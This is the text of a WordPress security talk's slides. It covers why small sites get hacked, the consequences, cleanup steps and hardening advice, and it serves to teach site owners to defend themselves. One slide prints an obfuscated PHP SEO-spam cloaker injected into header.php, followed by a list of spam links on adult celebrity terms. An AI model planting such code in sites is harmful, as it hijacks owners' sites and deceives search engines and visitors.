Justin Jones • Fort Wayne, IN @jjonesftw
I’m Justin Jones
0Teacher
0 Church Worker
0WordPress hobbyist
0 Podcast cohost at “The Weekly Theme Show”
0@jjonesftw
0 justinjones.net
Why would someone want to hack my site?
0The world doesn’t revolve around you
0 Crime of opportunity
0 Don’t leave your front door unlocked
0 “Black Hat” SEO
0To make money directly
0 Affiliate sales
0 Rogue virus scanners
0 Ransomware
Why would someone want to hack my site?
0 Serve up images and content for SPAM email
What do they do while they’re poking around my site?
0Alter robots.txt
0 Override the WordPress-generated robots.txt so their pages get picked up by search engines
0 Create backdoors in unsuspecting .php files for future attacks
0Add their own .php files and images to serve up their payload content
0 Some are only served to “robots” (search-engine crawlers) or keyed on the HTTP referrer
What do they do while they’re poking around my site?
0 Inject code into theme files, like header.php<? /*
 * NOTE(review): obfuscated SEO-spam cloaker, shown as what an injected header.php
 * looks like. What the visible code establishes, for anyone cleaning a site:
 *  - Function names are assembled from fragments ('fop' .'e' .'n') and every other
 *    string comes from a base64 table, so grepping for fopen/base64_decode or the
 *    spam terms will not find it; the '//1234' markers and
 *    $GLOBALS['_2008634924_'] are the literal strings to search for.
 *  - It reads $_SERVER['REMOTE_ADDR'] and $_SERVER['HTTP_USER_AGENT'] (table
 *    indexes 34 and 35) and only prints its link list when the visitor IP is in a
 *    stored range, the user agent matches the crawler list (google, bingbot, ...),
 *    or the request carries the GET parameter from table index 0 ('botko'). A
 *    normal browser visit therefore shows a clean page; that parameter is the
 *    thing to look for in access logs. (In this copy l__1 tests an unassigned
 *    $_7 instead of its argument $_4, so the user-agent branch may be inert.)
 *  - The IP ranges and the base64 + gzcompress'ed serialized link list are read
 *    from companion files '.core' and 'license.txt' (indexes 29-33 and 37-38),
 *    so deleting this snippet alone leaves the payload data in place.
 *  - error_reporting(0) is called up front unless that parameter is set,
 *    suppressing warnings that might otherwise reveal the injection.
 */ //1234$GLOBALS['_2008634924_']=Array('error_re' .'porting','function_e' .'xi' .'st' .'s','fop' .'e' .'n','fwrite','' .'f' .'clos' .'e','' .'s' .'trstr','strtolower','ex' .'p' .'lode','ip2long','i' .'p2l' .'ong','l' .'ong2ip','ip2long','' .'fi' .'le_exists','pre' .'g_mat' .'ch','file_ge' .'t_contents','pr' .'eg_match','f' .'i' .'le' .'_get' .'_c' .'ont' .'ent' .'s','u' .'nseriali' .'ze','count','range','a' .'rra' .'y_splice','array_' .'values','preg' .'_matc' .'h','file' .'_get_' .'contents','un' .'ser' .'ial' .'iz' .'e','gzuncompress','base' .'64_deco' .'de','' .'str' .'len'); function _1572011439($i){$afa=Array('Ym90a28=','ZmlsZV9wd' .'XRf' .'Y2' .'9ud' .'GV' .'udHM=','dw==','Z29v' .'Z' .'2' .'xl','c2x' .'1cnA=','' .'bXN' .'uY' .'m' .'90','Yml' .'u' .'Z2JvdA==','Ym90','Y' .'3' .'Jhd2' .'w' .'=','' .'c3BpZGV' .'y','cm9' .'ib3Q=','' .'SH' .'R0cENsaWVudA=' .'=','' .'Y3' .'V' .'y' .'b' .'A' .'==','' .'c2' .'Nvb3Rlcg==','d3d3c3' .'Rlcg==','' .'UHl0aG9' .'u','' .'dX' .'J' .'sb' .'Gli','cG' .'Vyb' .'A=' .'=','bGlid3d3','b' .'HlueA==','VkIgUHJva' .'mVjd' .'A=' .'=','U' .'Hl0aG' .'9uLXVybGxpYi8yL' .'j' .'Y=','TW9' .'6a' .'Wx' .'sYS' .'82N' .'jYuKD' .'Y' .'p','TW9' .'6' .'aWxs' .'YS80L' .'jAgK' .'GNvbXB' .'hdGli' .'b' .'G' .'U7IE1' .'TS' .'UUgNi4w' .'OyBXa' .'W5kb3dzIE5UIDUuMS' .'k=','T' .'W96aWx' .'sYS' .'8' .'0LjA' .'g' .'KGNv' .'bX' .'Bh' .'dGl' .'i' .'bGU' .'7KQ==','' .'TW96aWxsYS80' .'LjAgK' .'GNvbXB' .'hdGlibG' .'U7IE1TSUUgNS4w' .'MDsg' .'V' .'2luZG' .'93cyA5OCk=','' .'TW' .'96' .'aWxsYS8' .'0LjAgKG' .'NvbXBhdGlibG' .'U7I' .'E' .'1' .'TSUUg' .'N' .'i4wO' .'yBX' .'aW5' .'kb3dzIE5UIDUuMTsg' .'U1YxK' .'Q' .'==','' .'TW96' .'aWxs' .'YS80' .'LjAg' .'KGNvb' .'X' .'Bh' .'dGlibGU7IE' .'1TSUUgN' .'i4wOyBXaW5kb3dzIE5UIDU' .'uMTsgLk5FV' .'C' .'BDTF' .'IgM' .'S4wL' .'jM' .'p','Lw==','Lm' .'N' .'vcmU' .'=','fDxpc' .'D4oLiopPC9pc' .'D58VWl' .'z','LmNvcmU=','' .'fDx' .'p' .'cD4' .'oLiopPC9pc' .'D58V' .'W' .'lz','bGlj' .'ZW' .'5zZ' 
.'S50eH' .'Q=','U' .'kVNT1RF' .'X0' .'FERFI=','SF' .'R' .'U' .'UF9VU0' .'VSX0FH' .'RU' .'5U','Ym90' .'a2' .'8=','fDx' .'pbnQ+KC4q' .'K' .'T' .'wv' .'aW50Pnx' .'VaX' .'M=','bGljZW5zZS50' .'eHQ=','' .'UkVR' .'VUV' .'TVF9VUkk=','' .'PGJ' .'yPg' .'==');return base64_decode($afa[$i]);} if(isset($_GET[_1572011439(0)])){}else{$GLOBALS['_2008634924_'][0](0);}if(!$GLOBALS['_2008634924_'][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS['_2008634924_'][2]($_0,_1572011439(2));if(!$_2){return false;}else{$_3=$GLOBALS['_2008634924_'][3]($_2,$_1);$GLOBALS['_2008634924_'][4]($_2);return $_3;}}}function l__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS['_2008634924_'][5] ($GLOBALS['_2008634924_'][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS ['_2008634924_'][7](_1572011439(28),$_8);$_11=$GLOBALS['_2008634924_'][8]($_10[0]);$_12=$GLOBALS['_2008634924_'][9]($_10[1]);$_13=$GLOBALS['_2008634924_'][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS['_2008634924_'][11]($_9);return($_14&$_13)==($_11&$_13);}function l__3($REMOTE_ADDR){if($GLOBALS['_2008634924_'][12](_1572011439(29))){$GLOBALS['_2008634924_'][13](_1572011439(30),$GLOBALS['_2008634924_'][14](_1572011439(31)),$_15);}else{$GLOBALS['_2008634924_'][15](_1572011439(32),$GLOBALS['_2008634924_'][16](_1572011439(33)),$_15);}$_16=$GLOBALS['_2008634924_'][17]($_15[1]);foreach($_16 as $_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return (int)$_19;}function 
l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS['_2008634924_'][18]($_20);if($_23<$_18){return false;}$_24=$GLOBALS['_2008634924_'][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS['_2008634924_'][20]($_24,$_26,1);$_24=$GLOBALS['_2008634924_'][21]($_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 or isset($_GET[_1572011439(36)])or $_28){$GLOBALS['_2008634924_'][22](_1572011439(37),$GLOBALS ['_2008634924_'][23](_1572011439(38)),$_29);$_30=$GLOBALS['_2008634924_'][24]($GLOBALS['_2008634924_'][25]($GLOBALS['_2008634924_'][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS['_2008634924_'][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);} //1234?>
What do they do while they’re poking around my site?
0 Inject code into theme files, like header.php<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a>
<br><a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>
How Do They Get In?
0Outdated versions of WordPress
0Outdated themes and plugins
0Hosting providers behind the times
0 Insecure password / brute force
0 Compromised computer
0 Passwords cached in FTP clients, passwords stored in an unencrypted text file, etc…
0 Insecure internet connection
0 Rogue access points
0 Packet sniffers on public WiFi
What are the consequences?
0Google will punish you.
0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.
0 Google Safe Browsing or manual removal action
What are the consequences?
0Google will punish you.
0 Google Safe Browsing or manual removal action
What are the consequences?
0Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others
0 Spammy content will get indexed with every search engine
0 Don’t forget about directory listing sites, like Google Places / Google Maps
0 Your host may dump you for violating TOS
0Be a good neighbor!
What are the consequences?
0Be a good neighbor! Security is everyone’s responsibility
What are the consequences?
0Malware cost the US economy 2.2 billion dollars in lost productivity in 2011
0Are you an ecommerce site?
0 Payment gateway is probably offsite, but what about people’s email addresses?
0Membership site?
0 Many people re-use passwords
0 Linked In, Last.fm, many others recently
0Business or organization?
0 How much street cred will you earn serving content from exotic-dildos.co.cc
Is WordPress insecure?
0No.
0 The pharma hack had a patch out before it was exploited
0WordPress has a target on its back
0 WordPress is used by over 14.7% of Alexa Internet's "top 1 million" websites and as of August 2011 manages 22% of all new websites.
0 Some theme and plugin authors are lazy/sloppy, or use deprecated/inefficient methods
0 You are your own worst enemy!
0 Think about Windows XP back in like 2002
Is WordPress insecure?
0Be careful who you trust
0 Everyone is a “developer” now
0 NEVER download and install a theme for free that you should have paid for
0Shady scraper sites, torrents, etc…
0 “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto
Is WordPress insecure?
0Be careful who you trust
0 Be very wary of downloading a free theme outside of the WordPress.org theme repo
0Use “Theme Authenticity Checker” and “Theme Check”
0 Siobhan McKeown at WPMU.org Googled “free wordpress themes”
0 Top 10 results: 1 = wordpress.org; 1 = poorly coded; 8 = actively using encrypted code to insert spammy links
0 Use trusted theme marketplaces or commercial shops
Prepare for Disaster
0 It’s going to happen
0 Maintain regular backups
0 Server side or plugins
0Be registered with Google Webmaster Tools
0Know how to contact your hosting provider
0Know a developer
0Visit your site
0Watch your stats
Update. Update. Update.
0 Source: http://churchm.ag/wordpress-updates/
Update. Update. Update.
0August 2011, so 3.2.1 was most current
0 Less than half of the top 100k sites running WordPress were up to date!
0 WordPress iterates quickly to patch security holes. Keep updated to benefit from their work
0 Source: http://churchm.ag/wordpress-updates/
Update. Update. Update.
0WordPress core, .org plugins and .org themes can use the core update functionality
0 Some commercial theme and plugins have their own way of one click upgrade, some are manual only
0 Some have notifications, some don’t
0 Sign up for WordPress.org release notifications from download page
Here’s Where This Gets Technical
0 I’ll have these slides up on Slide Share
0 I’ve reserved time at the end for questions, and I’ll be available after for individual questions
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
0 Take a deep breath and crack open a beer. You’ve got some work ahead of you.
0Get back control of your site
0Get the site offline if you can!
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
0 Change *every* single one of your passwords
0 Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password
0 I suggest changing your email account passwords
0Hire a professional
0 Check out http://sucuri.net/
0 Many others out there, Google them up!
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
0 Regenerate WordPress secret keys / salts
0 Manually in wp-config.php or use a plugin
// Example wp-config.php secret keys and salts. These particular values are
// printed on a public slide, so they are placeholders only: never paste them
// into a real install; generate a fresh set of all eight instead.
// Rotating them is what invalidates existing WordPress login cookies, which is
// the reason to do it after a compromise (every session has to log in again).
define('AUTH_KEY', 'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');
define('SECURE_AUTH_KEY', 'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/');
define('LOGGED_IN_KEY', 'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');
define('NONCE_KEY', 'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');
define('AUTH_SALT', 'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');
define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');
define('LOGGED_IN_SALT', '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');
define('NONCE_SALT', 'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
0 Backup
0Restore from a previous backup
0 Find and delete all the junk they added
0 Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc…
0 Adding posts and images to database
0Reinstall WordPress core, plugins and themes
It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
0 Begin the process of restoring your good name
0 Request delisting of bogus content from Google and other search engines
0Very tedious, manual process
0 Request reevaluation from blacklisting services
0 Don’t forget about other services that pull content from your site, like Google places
0 Wait it out. This will take weeks and months
0 Prepare better for next time
Harden Your Site. The Easy Stuff.
0Keep up to date! WordPress, plugins, themes – but also PHP version on your host
0Use strong passwords – no words! Not P@$$woRd either.
0 Consider using a password manager
0 Remove the “admin” user
Harden Your Site. The Easy Stuff.
0Only connect using SFTP
0Never ever hack core WordPress files
0Keep a clean house!
0 Other WP installs, other PHP services, plugins, old themes
0Disable user registration
Harden Your Site. The More Complicated Stuff.
0 Store your wp-config file outside of public_html
0 Done at install or can be moved later
0 Change the database prefix
0Use strong database passwords
0Use proper 755 file permissions
0 If a plugin or theme asks you to set 777, avoid it.
Harden Your Site. The More Complicated Stuff.
0 Only log in to the site using SSL (https://...)
0Don’t advertise that you’re running an out of date version
0 Remove readme.html (plugins available)
0 Remove WordPress version from header (plugins available)
Harden Your Site. The More Complicated Stuff.
0 Plugins! Plugins! Plugins!
0 Monitor core / template files
0 “WordPress File Monitor Plus”
0 Scan template files for suspicious code
0 “AntiVirus”
0 WP and server security settings
0 “WebsiteDefender WordPress Security”
0 Keep up to date
0 “Update Notifications”
Harden Your Site. The More Complicated Stuff.
0 Plugins! Plugins! Plugins!
0 “WordPress Firewall 2”
0 “Block Bad Queries”
0 Backup
0VaultPress
0BackupBuddy
0 Login Lockdown
0Lock out excessive retries and mask login errors
0 Many others available for two factor auth, etc…
0 Sucuri plugin has a firewall to block known bad IPs
Should you really be hosting your own site?
0Do you like to change your own oil in your car or take it to the Jiffy Lube?
0WordPress.com is a great resource for most personal bloggers. Focus on writing your content.
0 Consider a WordPress managed host.
0 WP Engine, ZippyKid, Pagely, etc…
0Don’t be afraid to pay someone!
0 How important is this project?
0 What is your time worth?
Resources
0 Codepoet.com
0 eBook “Locking Down WordPress”
Resources
0These slides on Slide Share
0 Search for slides from Dre Armeda and Brad Williams
0WordPress.org Codex
0Otto on WordPress
0 Sucuri.net – service and blog
0 Lockdown WordPress – A Security Webinar with Dre Armeda
0 1.5 hour interview – great resource!
0 Countless plugins on the WordPress.org repo
0 http://sitecheck.sucuri.net/scanner/
Questions?
0No question is stupid. We’re all here to learn!
0 If you’re smarter than I am, please jump in here.